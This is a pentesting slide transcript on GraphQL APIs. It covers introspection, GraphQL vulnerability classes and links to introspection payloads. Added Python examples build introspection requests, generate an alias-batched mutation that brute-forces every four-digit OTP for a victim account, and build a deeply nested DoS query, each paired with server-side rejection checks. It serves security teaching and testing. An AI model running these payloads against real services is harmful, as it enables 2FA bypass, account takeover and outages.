Pentesting GraphQL APIs
Arun
July 17, 2020
Transcript
graphql {
• GraphQL
• GraphQL Architecture
• REST vs GraphQL
• GraphQL Schema
• Introspection Query
• GraphQL Vulnerabilities
• Pentesting Tools
• GraphQL in Action !!!
}
Ref: https://bit.ly/3hLZNO7
Ref: https://bit.ly/3fBQSNk
GraphQL Schema
• Query (type) – READ: for retrieving data/results, similar to GET in REST.
• Mutation (type) – WRITE: for modifications, like POST/PUT/DELETE operations in REST.
• Subscription (type) – EVENTS: for events/real-time updates.
Change the POST request into a GET request and append the payload from the links below to the endpoint URL:
https://pastebin.com/QyNaXVKg
https://pastebin.com/dFdsTaDQ
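The following is an added example, not code from the slides or from the pastebin payloads: it builds an introspection request both as the usual POST JSON body and as the equivalent GET URL (the conversion the slide describes), then enumerates the three root operation types and their fields from a constructed introspection response. The endpoint URL, the trimmed query and the sample response are assumptions made up for illustration.

```python
"""Added example (not from the slides): introspection as POST and as GET,
plus enumeration of the root operation types from a constructed response.
ENDPOINT and SAMPLE_RESPONSE are assumptions, not data from the talk."""
import json
from urllib.parse import urlencode, urlparse, parse_qs

# Assumed target endpoint; replace with the one under test.
ENDPOINT = "https://target.example/graphql"

# Trimmed version of the standard introspection query: root operation types
# and, for every type, its field names and return types.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      kind
      name
      fields { name type { name kind ofType { name kind } } }
    }
  }
}
"""

def post_body(query, variables=None):
    """JSON body a client normally sends with POST /graphql."""
    return json.dumps({"query": query, "variables": variables or {}})

def get_url(endpoint, query, variables=None):
    """Same operation as a GET: query (and JSON-encoded variables) become URL parameters.
    Worth trying when a WAF or CSRF control only inspects POST bodies."""
    params = {"query": query}
    if variables:
        params["variables"] = json.dumps(variables)
    return f"{endpoint}?{urlencode(params)}"

def query_from_get_url(url):
    """Recover the operation text from a GET URL (what the server will execute)."""
    return parse_qs(urlparse(url).query)["query"][0]

def root_types(introspection_response):
    """Map operation kind -> root type name, or None if the schema defines none."""
    schema = introspection_response["data"]["__schema"]
    return {
        "query": (schema.get("queryType") or {}).get("name"),
        "mutation": (schema.get("mutationType") or {}).get("name"),
        "subscription": (schema.get("subscriptionType") or {}).get("name"),
    }

def fields_of(introspection_response, type_name):
    """Field names of a named type, ignoring GraphQL's own __ meta types."""
    for t in introspection_response["data"]["__schema"]["types"]:
        if t["name"] == type_name and not t["name"].startswith("__"):
            return [f["name"] for f in t.get("fields") or []]
    return []

# Constructed sample response, shaped like a real introspection result.
SAMPLE_RESPONSE = {
    "data": {"__schema": {
        "queryType": {"name": "Query"},
        "mutationType": {"name": "Mutation"},
        "subscriptionType": None,
        "types": [
            {"kind": "OBJECT", "name": "Query", "fields": [
                {"name": "user", "type": {"name": "User", "kind": "OBJECT", "ofType": None}},
                {"name": "users", "type": {"name": None, "kind": "LIST",
                                          "ofType": {"name": "User", "kind": "OBJECT"}}}]},
            {"kind": "OBJECT", "name": "Mutation", "fields": [
                {"name": "updateUser", "type": {"name": "User", "kind": "OBJECT", "ofType": None}},
                {"name": "verifyOtp", "type": {"name": "Boolean", "kind": "SCALAR", "ofType": None}}]},
            {"kind": "OBJECT", "name": "User", "fields": [
                {"name": "id", "type": {"name": "ID", "kind": "SCALAR", "ofType": None}},
                {"name": "email", "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
                {"name": "isAdmin", "type": {"name": "Boolean", "kind": "SCALAR", "ofType": None}}]},
            {"kind": "OBJECT", "name": "__Schema", "fields": []},
        ]}}}

if __name__ == "__main__":
    print(post_body(INTROSPECTION_QUERY)[:60] + "...")
    print(get_url(ENDPOINT, INTROSPECTION_QUERY)[:80] + "...")
    for op, name in root_types(SAMPLE_RESPONSE).items():
        if name:
            print(op, "->", name, fields_of(SAMPLE_RESPONSE, name))
```

Against a live target, send `post_body(...)` as the request body or open `get_url(...)` directly; a server that answers the GET with the same schema accepts operations outside the POST path, which matters for CSRF and for controls that only inspect bodies. Fields exposed on the Mutation root (here the assumed `updateUser` and `verifyOtp`) are the first candidates for the access-control and brute-force checks later in the deck.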
• SQL Injection
• NoSQL Injection
• Access control related issues
• Mass Assignment
• IDOR
• Bypassing 2FA / brute-force attacks
• DoS attacks, etc.
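The slide names "bypassing 2FA / brute-force" and "DoS" as vulnerability classes without naming a technique. The added example below (mine, not from the talk) demonstrates one well-known GraphQL route to both: field aliases let a single HTTP request carry many copies of the same mutation, so a rate limit counted per request sees one attempt while the resolver checks hundreds of OTP guesses, and selection sets can be nested arbitrarily deep unless the server caps depth. It also shows the corresponding server-side guard. The mutation name `verifyOtp`, its arguments, the `friends` field and the limits are assumptions made up for illustration.

```python
"""Added example (not from the slides): alias batching for OTP brute force,
a deeply nested query for DoS, and the server-side checks that stop both.
Mutation/field names and limits are assumptions, not from the talk."""
import re

def alias_batch(mutation, arg_name, candidates, extra_args=""):
    """Build one operation with an aliased copy of `mutation` per candidate value.
    Assumes the mutation takes a string argument `arg_name` and exposes an `ok` field."""
    parts = [
        f'  g{i}: {mutation}({arg_name}: "{value}"{extra_args}) {{ ok }}'
        for i, value in enumerate(candidates)
    ]
    return "mutation {\n" + "\n".join(parts) + "\n}"

def nested_query(levels):
    """Constructed deeply nested query: user -> friends -> friends ... `levels` deep."""
    return "query { user " + "{ friends " * levels + "{ id }" + " }" * (levels + 1)

def count_root_fields(operation):
    """Server-side guard: count root-level fields (aliased or not) in an operation.
    Sufficient for the flat batches above; a real server should walk the parsed AST."""
    body = operation[operation.index("{") + 1: operation.rindex("}")]
    # a root field is `alias: name(` / `alias: name {` or bare `name(` / `name {` at line start
    return len(re.findall(r"^\s*(?:\w+\s*:\s*)?\w+\s*[({]", body, re.MULTILINE))

def query_depth(operation):
    """Maximum nesting of selection sets, the quantity a DoS depth limit caps."""
    depth = best = 0
    for ch in operation:
        if ch == "{":
            depth += 1
            best = max(best, depth)
        elif ch == "}":
            depth -= 1
    return best

def should_reject(operation, max_root_fields=10, max_depth=8):
    """Policy to enforce before executing: refuse alias batches and deep queries.
    Limits are assumed values; tune them to the legitimate client's needs."""
    return count_root_fields(operation) > max_root_fields or query_depth(operation) > max_depth

# Constructed attacker payload: every 4-digit OTP in one request.
OTP_GUESSES = [f"{n:04d}" for n in range(10000)]
PAYLOAD = alias_batch("verifyOtp", "code", OTP_GUESSES, extra_args=', email: "victim@example.com"')

if __name__ == "__main__":
    print(PAYLOAD.splitlines()[1])
    print("root fields:", count_root_fields(PAYLOAD), "depth:", query_depth(PAYLOAD))
    print("reject batch:", should_reject(PAYLOAD))
    deep = nested_query(7)
    print("nested depth:", query_depth(deep), "reject:", should_reject(deep))
```

Counting a request as one "attempt" is the defect being exploited: the limit must be applied per resolver invocation (or per alias of a sensitive mutation), and query depth and cost should be bounded before execution, not after the resolvers have already run.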